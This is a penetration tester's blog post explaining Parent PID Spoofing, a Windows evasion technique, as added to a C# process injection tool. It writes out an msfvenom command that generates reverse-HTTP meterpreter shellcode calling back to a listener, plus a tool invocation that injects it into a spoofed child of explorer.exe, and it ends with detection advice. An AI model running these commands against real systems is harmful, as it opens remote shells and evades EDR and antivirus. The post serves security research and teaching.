Parent PID Spoofing

Renos Nikolaou
Nov 2 · 4 min read

While I was conducting my research on process injection techniques, I came across Chirag’s blog where he wrote a tool with two process injection techniques, Vanila Injection and DLL Injection using C#.

I decided to contribute to his project by adding process hollowing technique and an evasion technique called Parent PID Spoofing for two main reasons:

  1. To improve my C# skills, leveraging Windows APIs.
  2. To do an in depth process injection research.

This post should be considered as the Part IV of Chirag’s Process Injection series. So, I will follow the same writing structure.

What is Parent Process Identifier (PID) Spoofing ?

Starting from Windows Vista, CreateProcess Windows API function and specifically the parameter lpStartupInfo can be used to start (spoof) an application (child process) where an adversary can specify the parent process. (e.g. As shown below, parent process: iexplore.exe with PID: 3224 spawned notepad.exe as a child process with PID: 6968).

For the purpose of Parent PID Spoofing evasion technique 5 Windows APIs are used:

Overview of Parent PID Spoofing

Parent PID Spoofing is an evasion technique used by malware and attackers that can utilize the CreateProcess Microsoft API and execute arbitrary code by injecting a shellcode, Dynamic-Link Library (DLL) or Portable Executable (PE) into the child process and thus evade some defenses like EDR and Anti-Virus.

Find below the steps that I followed while adding the Parent PID Spoofing evasion technique:

  1. The first API call InitializeProcThreadAttributeList initialized the attribute list and allocated the memory space required for the attribute.
  2. Used OpenProcess to Obtain the handle of the target process.
  3. UpdateProcThreadAttribute is called and set the parent process handle to PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.
  4. Last step was to call CreateProcess in order to pass a new flag in dwCreationFlags parameter called EXTENDED_STARTUPINFO_PRESENT that enables the caller to pass a STARTUPINFOEX structure pointer.

Demo

Currently the Parent PID Spoofing supports 3 process injection techniques (Vanila process injection, DLL injection and Process Hollowing) and for the purpose of the demonstration I will use the vanila process injection with shellcode in C format.

The tool can be found on github repo.

Required parameters:

  • /ppath : This parameter is used to specify the process path which will be the child process.
  • /path: MSFVenom shellcode.
  • /parentproc: The parent process binary name.
  • /f: The format of the shellcode that was generated.
  • /t: The target evasion technique that you want to use.

Generate a reverse http shellcode using MSFVenom. (Feel free to use any tool you want. Cobalt Strike, Donut, etc..etc..)

msfvenom -p windows/meterpreter/reverse_http exitfunc=thread LHOST=10.10.10.10 LPORT=80 -b "\x00" -f c
ProcessInjection.exe /ppath:"c:\windows\system32\notepad.exe" /path:"c:\users\user\desktop\shcode.txt" /parentproc:explorer /f:c /t:5

The screenshot shows that the tool found the parent process ID (explorer.exe- 4148), spawned notepad.exe (PID: 9692) as a child process and then injected the MSFVenom reverse http shellcode into the child process.

Got meterpreter reverse http shell with PID: 9692.

Detection

Monitor Windows API calls that are created with extended startup information and calls, that are being used to update process creation attributes such as CreateProcess and UpdateProcThreadAttribute accordingly. Also, monitor processes especially under (c:\Windows\System32\* or c:\Windows\SysWOW64\*) for abnormal behavior such as opening network connections.

As shown above, notepad.exe communicating with my Command and Control. (Metasploit Framework).

Thanks for reading the post. Feedback is always welcome.

Also, thanks to my friends George Koumettou , Andrianos Sergides and Alexis Mansour who helped and motivated me to write this post.

References


Follow me on twitter - https://twitter.com/r3n_hat

Renos Nikolaou

Written by

CyberSecurity enthusiast, Penetration Tester. OSCE, OSCP, OSWP, eCPTX, eWPTX, CEH Certified. — Twitter: @r3n_hat

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade